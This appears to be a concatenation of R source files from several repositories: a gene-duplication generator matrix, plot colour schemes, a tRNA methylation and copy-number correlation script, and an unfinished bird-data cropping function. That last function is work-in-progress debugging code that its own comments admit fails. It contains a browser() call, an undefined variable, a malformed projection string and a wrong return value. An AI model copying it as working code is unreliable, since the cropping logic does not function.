nonzerolength <- 7*(N-2)*(N-1)/2 + (N-1)*15 + 5
#Declare index vectors ii, jj and rate vector vv for construction of sparse
#Q matrix (ii(n) = i, jj(n) = j, vv(n) = q_ij <-> Q(i,j) = q_ij)
ii <- rep(0, nonzerolength)
jj <- rep(0, nonzerolength)
vv <- rep(0, nonzerolength)
#i is number of AAAA
#j is number of AAA-
#k = N-i-j is number of AA--
#First consider 'middle transitions' when nothing is 0
count1 <- 1
for (i in 2:N){#1:N-1, +1 for indexing
for (j in 2:(N-i+1)){#similar
if((N-i+1) > 1){
k <- N-(i-1)-(j-1)#k not indexing so no need to modify
# changed pbi, pbj, pbk to a single pb vector
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+6)] <- Pos[i,j]
jj[count1:(count1+6)] <- c(Pos[i+1,j],Pos[i+1,j-1],Pos[i-1,j+1],Pos[i,j+1],Pos[i-1,j],Pos[i,j-1],Pos[i,j])
vv[count1] <- pdk*pb[1]
vv[count1+1] <- pdj*pb[1]
vv[count1+2] <- pdi*pb[2]+2*(i-1)*up
vv[count1+3] <- pdk*pb[2]
vv[count1+4] <- pdi*pb[3]
vv[count1+5] <- pdj*pb[3]+(j-1)*up
vv[count1+6] <- -sum(vv[count1:(count1+5)])
count1 <- count1+7
}
}
#Now transitions where k = 0
j <- N-i+2
k <- N-(i-1)-(j-1)#=0
if (k != 0){
stop("k should be 0 but isn't")
}
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+4)] <- Pos[i,j]
jj[count1:(count1+4)] <- c(Pos[i+1,j-1],Pos[i-1,j+1],Pos[i,j-1],Pos[i-1,j],Pos[i,j])
vv[count1] <- pdj*pb[1]
vv[count1+1] <- pdi*pb[2]+2*(i-1)*up
vv[count1+2] <- pdj*pb[3]+(j-1)*up
vv[count1+3] <- pdi*pb[3]
vv[count1+4] <- -sum(vv[count1:(count1+3)])
count1 <- count1+5
}
#Now transitions where i = 0
i <- 1#indexing
for (j in 2:N){
k <- N-(i-1)-(j-1)
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+4)] <- Pos[i,j]
jj[count1:(count1+4)] <- c(Pos[i,j+1],Pos[i,j-1],Pos[i+1,j-1],Pos[i+1,j],Pos[i,j])
vv[count1] <- pdk*pb[2]
vv[count1+1] <- pdj*pb[3]+(j-1)*up
vv[count1+2] <- pdj*pb[1]
vv[count1+3] <- pdk*pb[1]
vv[count1+4] <- -sum(vv[count1:(count1+3)])
count1 <- count1 + 5
}
#Now transitions where i = N;
i <- N+1
j <- 1
k <- 0
#only pseudogenization here
ii[count1:(count1+1)] <- Pos[i,j]
jj[count1:(count1+1)] <- c(Pos[i-1,j+1],Pos[i,j])
vv[count1] <- 2*(i-1)*up
vv[count1+1] <- -vv[count1]
count1 <- count1+2
#Now transitions where j = 0;
j <- 1
for (i in 2:N){
k <- N-(i-1)-(j-1)
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+4)] <- Pos[i,j]
jj[count1:(count1+4)] <- c(Pos[i+1,j],Pos[i-1,j],Pos[i,j+1],Pos[i-1,j+1],Pos[i,j])
vv[count1] <- pdk*pb[1]
vv[count1+1] <- pdi*pb[3]
vv[count1+2] <- pdk*pb[2]
vv[count1+3] <- pdi*pb[2]+2*(i-1)*up
vv[count1+4] <- -sum(vv[count1:(count1+3)])
count1 <- count1+5
}
#Now transitions where j = N;
j <- N+1
i <- 1
k <- 0
pb <- pbirth(i-1,j-1,k,N)#j's can give birth to both other types so we need these, obviously pdj = 1 so that's omitted.
ii[count1:(count1+2)] <- Pos[i,j]
jj[count1:(count1+2)] <- c(Pos[i+1,j-1],Pos[i,j-1],Pos[i,j])
vv[count1] <- pb[1]
vv[count1+1] <- pb[3] +(j-1)*up
vv[count1+2] <- -vv[count1]-vv[count1+1]
count1 <- count1+2
#Finished getting rates
# Q is the generator matrix
Q <- sparseMatrix(i=ii,j=jj,x=vv,dims=c(count,count), symmetric=FALSE)
#e1 is initial distribution
e1 <- sparseMatrix(i=1,j=Pos[2,1],x=1,dims=c(1,count), symmetric=FALSE)
return(list(Q, e1, Pos))
}
pbirth <- function(i,j,k,N){
#This function gives the probability of birth of type i, j, k
#individuals given state of population
pbi <- (i/N)*(i-1)/(N-1) + (1/4)*(j/N)*(j-1)/(N-1) + (j/N)*i/(N-1)
pbj <- (j/N)*(k/(N-1)) + (j/N)*(i/(N-1)) + (1/2)*(j/N)*((j-1)/(N-1)) +2*(i/N)*(k/(N-1))
pbk <- (k/N)*((k-1)/(N-1)) + (j/N)*(k/(N-1)) + (1/4)*(j/N)*((j-1)/(N-1))
# eps <- 1e-15
return(c(pbi, pbj, pbk))
}
| /R/Genedupdip_neutralgenerator.R | no_license | peterbchi/CNVSelectR | R | false | false | 5,042 | r | # Build and Reload Package: 'Ctrl + Shift + B'
# Check Package: 'Ctrl + Shift + E'
# Test Package: 'Ctrl + Shift + T'
#' Neutral model generator
#'
#' This function creates the infinitesimal generator for the model
#'
#'
#' @param N population size
#' @param up Poisson rate of pseudogenization
#' @keywords phylogeny, CNV, neutral model
#' @export
#' @examples
#' Genedupdip_neutralgenerator(N, up)
Genedupdip_neutralgenerator <- function(N,up){
#Generator for the model without neofunctionalization
Pos <- matrix(0, ncol=N+1, nrow=N+1)
count <- 0
#Create indexing matrix Pos such that Q(Pos(i,j),:) is row of Q
#corresponding to state (i,j), etc.
for (i in 1:(N+1)){
for (j in 1:(N+2-i)){
#if ~(i==1 && j ==1) #&& ~(i== 1 && j == N+1)
count <- count + 1
Pos[i,j] <- count
}
}
# Evaluate number of non-zero entries of Q
nonzerolength <- 7*(N-2)*(N-1)/2 + (N-1)*15 + 5
#Declare index vectors ii, jj and rate vector vv for construction of sparse
#Q matrix (ii(n) = i, jj(n) = j, vv(n) = q_ij <-> Q(i,j) = q_ij)
ii <- rep(0, nonzerolength)
jj <- rep(0, nonzerolength)
vv <- rep(0, nonzerolength)
#i is number of AAAA
#j is number of AAA-
#k = N-i-j is number of AA--
#First consider 'middle transitions' when nothing is 0
count1 <- 1
for (i in 2:N){#1:N-1, +1 for indexing
for (j in 2:(N-i+1)){#similar
if((N-i+1) > 1){
k <- N-(i-1)-(j-1)#k not indexing so no need to modify
# changed pbi, pbj, pbk to a single pb vector
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+6)] <- Pos[i,j]
jj[count1:(count1+6)] <- c(Pos[i+1,j],Pos[i+1,j-1],Pos[i-1,j+1],Pos[i,j+1],Pos[i-1,j],Pos[i,j-1],Pos[i,j])
vv[count1] <- pdk*pb[1]
vv[count1+1] <- pdj*pb[1]
vv[count1+2] <- pdi*pb[2]+2*(i-1)*up
vv[count1+3] <- pdk*pb[2]
vv[count1+4] <- pdi*pb[3]
vv[count1+5] <- pdj*pb[3]+(j-1)*up
vv[count1+6] <- -sum(vv[count1:(count1+5)])
count1 <- count1+7
}
}
#Now transitions where k = 0
j <- N-i+2
k <- N-(i-1)-(j-1)#=0
if (k != 0){
stop("k should be 0 but isn't")
}
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+4)] <- Pos[i,j]
jj[count1:(count1+4)] <- c(Pos[i+1,j-1],Pos[i-1,j+1],Pos[i,j-1],Pos[i-1,j],Pos[i,j])
vv[count1] <- pdj*pb[1]
vv[count1+1] <- pdi*pb[2]+2*(i-1)*up
vv[count1+2] <- pdj*pb[3]+(j-1)*up
vv[count1+3] <- pdi*pb[3]
vv[count1+4] <- -sum(vv[count1:(count1+3)])
count1 <- count1+5
}
#Now transitions where i = 0
i <- 1#indexing
for (j in 2:N){
k <- N-(i-1)-(j-1)
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+4)] <- Pos[i,j]
jj[count1:(count1+4)] <- c(Pos[i,j+1],Pos[i,j-1],Pos[i+1,j-1],Pos[i+1,j],Pos[i,j])
vv[count1] <- pdk*pb[2]
vv[count1+1] <- pdj*pb[3]+(j-1)*up
vv[count1+2] <- pdj*pb[1]
vv[count1+3] <- pdk*pb[1]
vv[count1+4] <- -sum(vv[count1:(count1+3)])
count1 <- count1 + 5
}
#Now transitions where i = N;
i <- N+1
j <- 1
k <- 0
#only pseudogenization here
ii[count1:(count1+1)] <- Pos[i,j]
jj[count1:(count1+1)] <- c(Pos[i-1,j+1],Pos[i,j])
vv[count1] <- 2*(i-1)*up
vv[count1+1] <- -vv[count1]
count1 <- count1+2
#Now transitions where j = 0;
j <- 1
for (i in 2:N){
k <- N-(i-1)-(j-1)
pb <- pbirth(i-1,j-1,k,N)
pdi <- (i-1)/N
pdj <- (j-1)/N
pdk <- k/N
ii[count1:(count1+4)] <- Pos[i,j]
jj[count1:(count1+4)] <- c(Pos[i+1,j],Pos[i-1,j],Pos[i,j+1],Pos[i-1,j+1],Pos[i,j])
vv[count1] <- pdk*pb[1]
vv[count1+1] <- pdi*pb[3]
vv[count1+2] <- pdk*pb[2]
vv[count1+3] <- pdi*pb[2]+2*(i-1)*up
vv[count1+4] <- -sum(vv[count1:(count1+3)])
count1 <- count1+5
}
#Now transitions where j = N;
j <- N+1
i <- 1
k <- 0
pb <- pbirth(i-1,j-1,k,N)#j's can give birth to both other types so we need these, obviously pdj = 1 so that's omitted.
ii[count1:(count1+2)] <- Pos[i,j]
jj[count1:(count1+2)] <- c(Pos[i+1,j-1],Pos[i,j-1],Pos[i,j])
vv[count1] <- pb[1]
vv[count1+1] <- pb[3] +(j-1)*up
vv[count1+2] <- -vv[count1]-vv[count1+1]
count1 <- count1+2
#Finished getting rates
# Q is the generator matrix
Q <- sparseMatrix(i=ii,j=jj,x=vv,dims=c(count,count), symmetric=FALSE)
#e1 is initial distribution
e1 <- sparseMatrix(i=1,j=Pos[2,1],x=1,dims=c(1,count), symmetric=FALSE)
return(list(Q, e1, Pos))
}
pbirth <- function(i,j,k,N){
#This function gives the probability of birth of type i, j, k
#individuals given state of population
pbi <- (i/N)*(i-1)/(N-1) + (1/4)*(j/N)*(j-1)/(N-1) + (j/N)*i/(N-1)
pbj <- (j/N)*(k/(N-1)) + (j/N)*(i/(N-1)) + (1/2)*(j/N)*((j-1)/(N-1)) +2*(i/N)*(k/(N-1))
pbk <- (k/N)*((k-1)/(N-1)) + (j/N)*(k/(N-1)) + (1/4)*(j/N)*((j-1)/(N-1))
# eps <- 1e-15
return(c(pbi, pbj, pbk))
}
|
# Plot templates:
# Colour schemes
# rm(list = setdiff(ls(), keep))
# dual - cadet-red
dual1.light <- data.frame("c" = c(64, 127, 127), "r" = c(212, 106, 106)) / 255
dual1.dark <- data.frame("c" = c(13, 77, 77), "r" = c(128, 21, 21)) / 255
dual1.mixed <- data.frame("c" = c(64, 127, 127), "r" = c(128, 21, 21)) / 255
# dual2 - midnightblue-coral
dual2 <- data.frame("m" = c(25, 25, 112), "c" = c(243, 115, 112)) / 255
dual1.light[, 1]
# triadic1 - rainbow
rgb.triad1 <- data.frame("g" = c(0, 157, 125), "o" = c(247, 172, 0), "v" = c(125, 037, 128))
triad1 <- rgb.triad1/255
triad1
# triadic2 - teal-mulberry
rgb.triad2 <- data.frame("t" = c(71, 142, 117), "m" = c(172, 86, 133), "y" = c(212, 202, 106))
triad2 <- rgb.triad2/255
triad2
colourscheme.names <- setdiff(ls(), keep)
cat("Thank you. Colour schemes succesfully imported.")
| /FilopodyanR/ColourSchemes.R | no_license | gurdon-institute/Filopodyan | R | false | false | 865 | r | # Plot templates:
# Colour schemes
# rm(list = setdiff(ls(), keep))
# dual - cadet-red
dual1.light <- data.frame("c" = c(64, 127, 127), "r" = c(212, 106, 106)) / 255
dual1.dark <- data.frame("c" = c(13, 77, 77), "r" = c(128, 21, 21)) / 255
dual1.mixed <- data.frame("c" = c(64, 127, 127), "r" = c(128, 21, 21)) / 255
# dual2 - midnightblue-coral
dual2 <- data.frame("m" = c(25, 25, 112), "c" = c(243, 115, 112)) / 255
dual1.light[, 1]
# triadic1 - rainbow
rgb.triad1 <- data.frame("g" = c(0, 157, 125), "o" = c(247, 172, 0), "v" = c(125, 037, 128))
triad1 <- rgb.triad1/255
triad1
# triadic2 - teal-mulberry
rgb.triad2 <- data.frame("t" = c(71, 142, 117), "m" = c(172, 86, 133), "y" = c(212, 202, 106))
triad2 <- rgb.triad2/255
triad2
colourscheme.names <- setdiff(ls(), keep)
cat("Thank you. Colour schemes succesfully imported.")
|
change_chr <- function(chromosome){
chr = strsplit(chromosome,"_|\\.|-")[[1]][1]
chrnumb = substr(chr,4,5)
return(chrnumb)
}
transformdata <- function(data,transf){
aa_idx = regexpr("i?[A-Z][a-z]{2}[A-Z]{3}",rownames(data))==1
data = data[aa_idx,]
if (transf=="log"){
outdata = sapply(data,log)
# Remove inf values
outdata[outdata==-Inf] = NaN
rownames(outdata)=rownames(data)
}else if (transf=="arcsinh"){
outdata = sapply(data,asinh)
rownames(outdata)=rownames(data)
}else if (transf=="sqrt"){
outdata = sapply(data,sqrt)
rownames(outdata)=rownames(data)
}else if (transf=="rel"){
# Compute relative data
outdata = data.frame(matrix(ncol = ncol(data), nrow = nrow(data)),row.names = rownames(data))
colnames(outdata)= colnames(data)
aa = sapply(rownames(outdata),function(x) substr(x,1,nchar(x)-3))
uniqueaa = unique(aa)
for (n in uniqueaa){
idx = (aa %in% n)
idx_data = matrix(as.matrix(data[idx,]), ncol = ncol(data), nrow = sum(idx))
total = colSums(idx_data)
outdata[idx,] = t(apply(idx_data,1,function(x) x/total))
iszero = (total %in% 0)
if (any(iszero)){
outdata[idx,iszero] = 1.0/sum(idx)
}
}
}else{
outdata=data
}
return(outdata)
}
mean_anticodon <- function(df){
anticodons = sapply(rownames(df),function(x) strsplit(x,"-")[[1]][2])
df_out = t(sapply(unique(anticodons), function(x) colMeans(df[anticodons==x,], na.rm=T)))
return(df_out)
}
# Load data
cancer_types = c(BRCA="BRCA",PRAD="PRAD",kidney="KICH;KIRP;KIRC",lung="LUAD;LUSC",HNSC="HNSC",uterus="UCEC;CESC",
liver="LIHC;CHOL",THCA="THCA",colorectal="COAD;READ",ESCA="ESCA",STAD="STAD",BLCA="BLCA",PAAD="PAAD",THYM="THYM",
SKCM="SKCM",PCPG="PCPG")
path="/users/lserrano/xhernandez/tRNA_methylation/"
trna_coord = read.csv(paste0(path,"Data/Genomes/H.sapiens/hg19.tRNAscan.bed12"), sep="\t", header = F, row.names = 4)
trna_coord$V1 = sapply(as.character(trna_coord$V1),change_chr)
# tRNAs
trna = read.csv("data/TCGAall_nomod.csv",row.names = 1)
anticodon = transformdata(trna,"sqrt")
# Keep unique coordinates
genes = rownames(unique(trna_coord[,c(1,2,3)]))
## Analyze methylation
rm(rawvalues)
for (type in names(cancer_types)){
# Get data
if (exists("rawvalues")){
add = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
rawvalues = cbind(rawvalues,add)
}else{
rawvalues = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
}
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman Methylation"
write.csv(correlations,"results/trnaH_methylation_corr_allsamples.csv")
## Analyze CNA
path="/users/lserrano/xhernandez/tRNA_scna/"
rm(rawvalues)
for (type in names(cancer_types)){
# Get data
if (exists("rawvalues")){
add = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
rawvalues = cbind(rawvalues,add)
}else{
rawvalues = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
}
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman CNA"
write.csv(correlations,"results/trnaH_CNA_corr_allsamples.csv") | /healthy/11-2_analyze_scna_methylation_allsamples.R | no_license | mywanuo/tRNA_TCGA | R | false | false | 4,694 | r | change_chr <- function(chromosome){
chr = strsplit(chromosome,"_|\\.|-")[[1]][1]
chrnumb = substr(chr,4,5)
return(chrnumb)
}
transformdata <- function(data,transf){
aa_idx = regexpr("i?[A-Z][a-z]{2}[A-Z]{3}",rownames(data))==1
data = data[aa_idx,]
if (transf=="log"){
outdata = sapply(data,log)
# Remove inf values
outdata[outdata==-Inf] = NaN
rownames(outdata)=rownames(data)
}else if (transf=="arcsinh"){
outdata = sapply(data,asinh)
rownames(outdata)=rownames(data)
}else if (transf=="sqrt"){
outdata = sapply(data,sqrt)
rownames(outdata)=rownames(data)
}else if (transf=="rel"){
# Compute relative data
outdata = data.frame(matrix(ncol = ncol(data), nrow = nrow(data)),row.names = rownames(data))
colnames(outdata)= colnames(data)
aa = sapply(rownames(outdata),function(x) substr(x,1,nchar(x)-3))
uniqueaa = unique(aa)
for (n in uniqueaa){
idx = (aa %in% n)
idx_data = matrix(as.matrix(data[idx,]), ncol = ncol(data), nrow = sum(idx))
total = colSums(idx_data)
outdata[idx,] = t(apply(idx_data,1,function(x) x/total))
iszero = (total %in% 0)
if (any(iszero)){
outdata[idx,iszero] = 1.0/sum(idx)
}
}
}else{
outdata=data
}
return(outdata)
}
mean_anticodon <- function(df){
anticodons = sapply(rownames(df),function(x) strsplit(x,"-")[[1]][2])
df_out = t(sapply(unique(anticodons), function(x) colMeans(df[anticodons==x,], na.rm=T)))
return(df_out)
}
# Load data
cancer_types = c(BRCA="BRCA",PRAD="PRAD",kidney="KICH;KIRP;KIRC",lung="LUAD;LUSC",HNSC="HNSC",uterus="UCEC;CESC",
liver="LIHC;CHOL",THCA="THCA",colorectal="COAD;READ",ESCA="ESCA",STAD="STAD",BLCA="BLCA",PAAD="PAAD",THYM="THYM",
SKCM="SKCM",PCPG="PCPG")
path="/users/lserrano/xhernandez/tRNA_methylation/"
trna_coord = read.csv(paste0(path,"Data/Genomes/H.sapiens/hg19.tRNAscan.bed12"), sep="\t", header = F, row.names = 4)
trna_coord$V1 = sapply(as.character(trna_coord$V1),change_chr)
# tRNAs
trna = read.csv("data/TCGAall_nomod.csv",row.names = 1)
anticodon = transformdata(trna,"sqrt")
# Keep unique coordinates
genes = rownames(unique(trna_coord[,c(1,2,3)]))
## Analyze methylation
rm(rawvalues)
for (type in names(cancer_types)){
# Get data
if (exists("rawvalues")){
add = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
rawvalues = cbind(rawvalues,add)
}else{
rawvalues = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
}
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman Methylation"
write.csv(correlations,"results/trnaH_methylation_corr_allsamples.csv")
## Analyze CNA
path="/users/lserrano/xhernandez/tRNA_scna/"
rm(rawvalues)
for (type in names(cancer_types)){
# Get data
if (exists("rawvalues")){
add = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
rawvalues = cbind(rawvalues,add)
}else{
rawvalues = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
}
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman CNA"
write.csv(correlations,"results/trnaH_CNA_corr_allsamples.csv") |
# loadData Function
loadCroppedData <- function(sim = sim, studyArea = sim$studyArea,
dataPath = file.path(modulePath(sim), "prepingInputs/data"),
locationDataName = sim$locationDataName,
dataName = sim$dataName){
require(data.table)
require(raster)
require(sf)
require(reproducible)
dPath <- file.path(dataPath, dataName)
lPath <- file.path(dataPath, locationDataName)
if (!file.exists(dPath)){
invisible(readline(prompt="Make sure you have the dataset in Google Drives folder 'BAM', and press [enter] to continue"))
require(googledrive)
drive_download(file.path("BAM",dataName), path = dPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = dPath, pattern = ".RData")){
birdData <- data.table(load(dPath))
birdData <- as.data.table(get(birdData[,V1]))
} else if (grepl(x = dPath, pattern = ".rds")){
birdData <- as.data.table(readRDS(dPath))
} else if (grepl(x = dPath, pattern = ".csv")){
birdData <- fread(dPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
if (!any(names(birdData)=="X")&!file.exists(lPath)){
invisible(readline(prompt= paste0("Location (X, Y) was not found in data file. ",
"Please make sure you have the location dataset ('*.RData', '*.csv', '*.rds')",
"with at least X, Y and 'SS_derived' or equivalent 'SS' ",
"in Google Drives folder 'BAM', and press [enter] to continue")))
require(googledrive)
drive_download(file.path("BAM",data), path = lPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = lPath, pattern = ".RData")){
locationData <- data.table(load(lPath))
locationData <- as.data.table(get(locationData[,V1]))
} else if (grepl(x = lPath, pattern = ".rds")){
locationData <- as.data.table(readRDS(lPath))
} else if (grepl(x = lPath, pattern = ".csv")){
locationData <- fread(lPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
bdSS <- unique(birdData[,SS_derived])
location <- subset(x = locationData,
subset = SS %in% bdSS,
select = c(SS,X_coor,Y_coor)) %>%
unique()
names(location) <- c("SS_derived", "X", "Y")
birdData <- merge(x = birdData, y = location, by = "SS_derived")
# reproject studyArea to match data
# ============= ALL BELOW FAILED SO FAR ======================
browser()
# Getting only the points
points <- data.frame(X = birdData$X, Y = birdData$Y) %>%
SpatialPoints()
epsg32610 <- "+init=epsg:32610" # NEED TO TRY THIS. THIS IS UTM. It is possible this is the projection, considering the data comes from GP
epsg3857 <- "+init=epsg:3857" # Google maps, etc...
epsg4267 <- "+init=epsg:4267"
epsg4326 <- "+init=epsg:4326"
epsg4269 <- "+init=epsg:4269"
LCC05 <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
LambertsConformalConic <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
# Already tried: original data, all the following projections, transforming both points and rasters and shapefile.
# Nothing worked.
studyAreaToCrop <- Cache(prepInputs, url = sim$url.studyArea,
destinationPath = sim$tempPath.studyArea) %>%
selectSpecificAreas(specificAreas = sim$specificAreaToCropShapefile)
# TRANSFORMING POINTS (wich appear to not have a projection) --> Still not aligning
pointsDF <- data.frame(X = birdData$X, Y = birdData$Y)
coordinates(pointsDF) <- ~X+Y
projection(pointsDF) <- "+init:epsg=4326"
pointsTrans <- spTransform(pointsDF, CRS(projection(sim$vegMap)))
# TRYING SHAPEFILE SENT BY DIANA --> It's not the original projection from the points
require(rgdal)
newSHPPath <- "/home/tmichele/Documents/GitHub/birdsBECzonesBC/modules/prepingInputs/data/province_state_lcc.shp"
newSHP <- readOGR(newSHPPath)
naStates <- subset(newSHP, is.na(STATE))
studyAreaToCrop <- sp::spTransform(studyAreaToCrop, CRSobj = LambertsConformalConic)
studyAreaToCropSHP <- sp::spTransform(naStates, CRSobj = epsg4267) #and also tested all other projections...
plot(studyAreaToCrop) #or nStates
plot(points, add= TRUE , col = 'red', pch = 19, cex = 0.5) #or pointsTrans with vegMap plot
# ============= ALL FAILED SO FAR ======================
xmin <- raster::extent(studyAreaToCrop)[1]
xmax <- raster::extent(studyAreaToCrop)[2]
ymin <- raster::extent(studyAreaToCrop)[3]
ymax <- raster::extent(studyAreaToCrop)[4]
birdData2 <- birdData[birdData$X>xmin & birdData$X<xmax &
birdData$Y>ymin & birdData$Y<ymax,] # THERE ARE POINTS (Nicole's map showed it!), I JUST DONT KNOW WHY THESE ARE NOT BEING SELECTED...
if (nrow(birdData)==0){
stop("The selected area doesn't contain data. Try increasing the area.")
}
return(birdData)
} | /modules/prepingInputs/R/loadCroppedData.R | no_license | tati-micheletti/birdsBECzonesBC | R | false | false | 5,091 | r | # loadData Function
loadCroppedData <- function(sim = sim, studyArea = sim$studyArea,
dataPath = file.path(modulePath(sim), "prepingInputs/data"),
locationDataName = sim$locationDataName,
dataName = sim$dataName){
require(data.table)
require(raster)
require(sf)
require(reproducible)
dPath <- file.path(dataPath, dataName)
lPath <- file.path(dataPath, locationDataName)
if (!file.exists(dPath)){
invisible(readline(prompt="Make sure you have the dataset in Google Drives folder 'BAM', and press [enter] to continue"))
require(googledrive)
drive_download(file.path("BAM",dataName), path = dPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = dPath, pattern = ".RData")){
birdData <- data.table(load(dPath))
birdData <- as.data.table(get(birdData[,V1]))
} else if (grepl(x = dPath, pattern = ".rds")){
birdData <- as.data.table(readRDS(dPath))
} else if (grepl(x = dPath, pattern = ".csv")){
birdData <- fread(dPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
if (!any(names(birdData)=="X")&!file.exists(lPath)){
invisible(readline(prompt= paste0("Location (X, Y) was not found in data file. ",
"Please make sure you have the location dataset ('*.RData', '*.csv', '*.rds')",
"with at least X, Y and 'SS_derived' or equivalent 'SS' ",
"in Google Drives folder 'BAM', and press [enter] to continue")))
require(googledrive)
drive_download(file.path("BAM",data), path = lPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = lPath, pattern = ".RData")){
locationData <- data.table(load(lPath))
locationData <- as.data.table(get(locationData[,V1]))
} else if (grepl(x = lPath, pattern = ".rds")){
locationData <- as.data.table(readRDS(lPath))
} else if (grepl(x = lPath, pattern = ".csv")){
locationData <- fread(lPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
bdSS <- unique(birdData[,SS_derived])
location <- subset(x = locationData,
subset = SS %in% bdSS,
select = c(SS,X_coor,Y_coor)) %>%
unique()
names(location) <- c("SS_derived", "X", "Y")
birdData <- merge(x = birdData, y = location, by = "SS_derived")
# reproject studyArea to match data
# ============= ALL BELOW FAILED SO FAR ======================
browser()
# Getting only the points
points <- data.frame(X = birdData$X, Y = birdData$Y) %>%
SpatialPoints()
epsg32610 <- "+init=epsg:32610" # NEED TO TRY THIS. THIS IS UTM. It is possible this is the projection, considering the data comes from GP
epsg3857 <- "+init=epsg:3857" # Google maps, etc...
epsg4267 <- "+init=epsg:4267"
epsg4326 <- "+init=epsg:4326"
epsg4269 <- "+init=epsg:4269"
LCC05 <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
LambertsConformalConic <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
# Already tried: original data, all the following projections, transforming both points and rasters and shapefile.
# Nothing worked.
studyAreaToCrop <- Cache(prepInputs, url = sim$url.studyArea,
destinationPath = sim$tempPath.studyArea) %>%
selectSpecificAreas(specificAreas = sim$specificAreaToCropShapefile)
# TRANSFORMING POINTS (wich appear to not have a projection) --> Still not aligning
pointsDF <- data.frame(X = birdData$X, Y = birdData$Y)
coordinates(pointsDF) <- ~X+Y
projection(pointsDF) <- "+init:epsg=4326"
pointsTrans <- spTransform(pointsDF, CRS(projection(sim$vegMap)))
# TRYING SHAPEFILE SENT BY DIANA --> It's not the original projection from the points
require(rgdal)
